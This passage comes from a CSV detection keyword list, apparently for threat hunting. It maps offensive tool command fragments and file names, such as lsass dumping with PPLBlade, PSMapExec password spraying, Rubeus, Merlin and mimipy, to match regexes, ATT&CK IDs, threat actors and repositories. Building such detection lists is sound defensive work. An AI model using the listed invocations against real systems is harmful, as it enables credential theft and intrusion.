T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","N/A","10","10","46","6","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z","2137" "* MemReader_BoF*",".{0,1000}\sMemReader_BoF.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - 
Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","N/A","10","10","46","6","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z","2138" "* merlin.dll*",".{0,1000}\smerlin\.dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","2139" "* merlin.py *",".{0,1000}\smerlin\.py\s.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","0","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","2140" "* met_inject*",".{0,1000}\smet_inject.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2142" "* MetasploitCoop*",".{0,1000}\sMetasploitCoop.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop_0x727","1","0","N/A","N/A","10","10","217","38","2021-08-17T15:24:50Z","2021-08-17T10:37:44Z","2143" "* metasploit-info.nse*",".{0,1000}\smetasploit\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2144" "* metasploit-msgrpc-brute.nse*",".{0,1000}\smetasploit\-msgrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2145" "* metasploit-omnibus-builder *",".{0,1000}\smetasploit\-omnibus\-builder\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","2146" "* metasploit-xmlrpc-brute.nse*",".{0,1000}\smetasploit\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2147" "* -method * -nthash *",".{0,1000}\s\-method\s.{0,1000}\s\-nthash\s.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","2148" "* -Method GenRelayList*",".{0,1000}\s\-Method\sGenRelayList.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2149" "* -Method PSRemoting -Command *",".{0,1000}\s\-Method\sPSRemoting\s\-Command\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","2150" "* -Method 
SessionHunter*",".{0,1000}\s\-Method\sSessionHunter.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2151" "* -Method Spray -AccountAsPassword*",".{0,1000}\s\-Method\sSpray\s\-AccountAsPassword.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2152" "* -Method Spray -EmptyPassword*",".{0,1000}\s\-Method\sSpray\s\-EmptyPassword.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2153" "* -Method Spray -Hash *",".{0,1000}\s\-Method\sSpray\s\-Hash\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2154" "* -Method Spray -Password *",".{0,1000}\s\-Method\sSpray\s\-Password\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2155" "* Microsploit.sh*",".{0,1000}\sMicrosploit\.sh.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Microsploit","1","0","N/A","N/A","N/A","5","439","121","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z","2156" "* mikrotik-routeros-brute.nse*",".{0,1000}\smikrotik\-routeros\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2157" "* mimidropper.hta*",".{0,1000}\smimidropper\.hta.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","2158" "* mimikittenz*",".{0,1000}\smimikittenz.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2159" "* mimipenguin.sh*",".{0,1000}\smimipenguin\.sh.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","0","N/A","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","2160" "* mimipy.py *",".{0,1000}\smimipy\.py\s.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","0","N/A","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","2161" "* mimipy.py *",".{0,1000}\smimipy\.py\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2162" "* minidump-rs.exe*",".{0,1000}\sminidump\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2163" "* MirrorDump.exe*",".{0,1000}\sMirrorDump\.exe.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","2164" "* mkzoneslices.sh*",".{0,1000}\smkzoneslices\.sh.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","2165" "* mmouse-brute.nse*",".{0,1000}\smmouse\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2166" "* mmouse-exec.nse*",".{0,1000}\smmouse\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2167" "* mobaxterm.py*",".{0,1000}\smobaxterm\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2168" "* --mobaxterm-poison-hkcr*",".{0,1000}\s\-\-mobaxterm\-poison\-hkcr.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","2169" "* 
modbus-discover.nse*",".{0,1000}\smodbus\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2170" "* --mode decrypt --dumpname *.dmp --key *",".{0,1000}\s\-\-mode\sdecrypt\s\-\-dumpname\s.{0,1000}\.dmp\s\-\-key\s.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","2171" "* --mode dump --name *.exe --handle procexp --obfuscate*",".{0,1000}\s\-\-mode\sdump\s\-\-name\s.{0,1000}\.exe\s\-\-handle\sprocexp\s\-\-obfuscate.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","2172" "* --mode dump --name lsass.exe*",".{0,1000}\s\-\-mode\sdump\s\-\-name\slsass\.exe.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the 
disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","2173" "* --mode proxy --ghidra *--dll *",".{0,1000}\s\-\-mode\sproxy\s\-\-ghidra\s.{0,1000}\-\-dll\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","2174" "* -Module Bloodhound -Method All*",".{0,1000}\s\-Module\sBloodhound\s\-Method\sAll.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","2175" "* -Module Bloodhound -Scope All*",".{0,1000}\s\-Module\sBloodhound\s\-Scope\sAll.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","2176" "* -Module kerbdump*",".{0,1000}\s\-Module\skerbdump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2177" "* --module o365_spray_activesync*",".{0,1000}\s\-\-module\so365_spray_activesync.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2178" "* mongodb-brute.nse*",".{0,1000}\smongodb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2179" "* mongodb-databases.nse*",".{0,1000}\smongodb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2180" "* mongodb-info.nse*",".{0,1000}\smongodb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2181" "* monitor /interval:* /filteruser:*",".{0,1000}\smonitor\s\/interval\:.{0,1000}\s\/filteruser\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2182" "* moodlescan -r -u *",".{0,1000}\smoodlescan\s\-r\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2183" "* -Mouselogger Start*",".{0,1000}\s\-Mouselogger\sStart.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2184" "* mouselogger.py*",".{0,1000}\smouselogger\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 
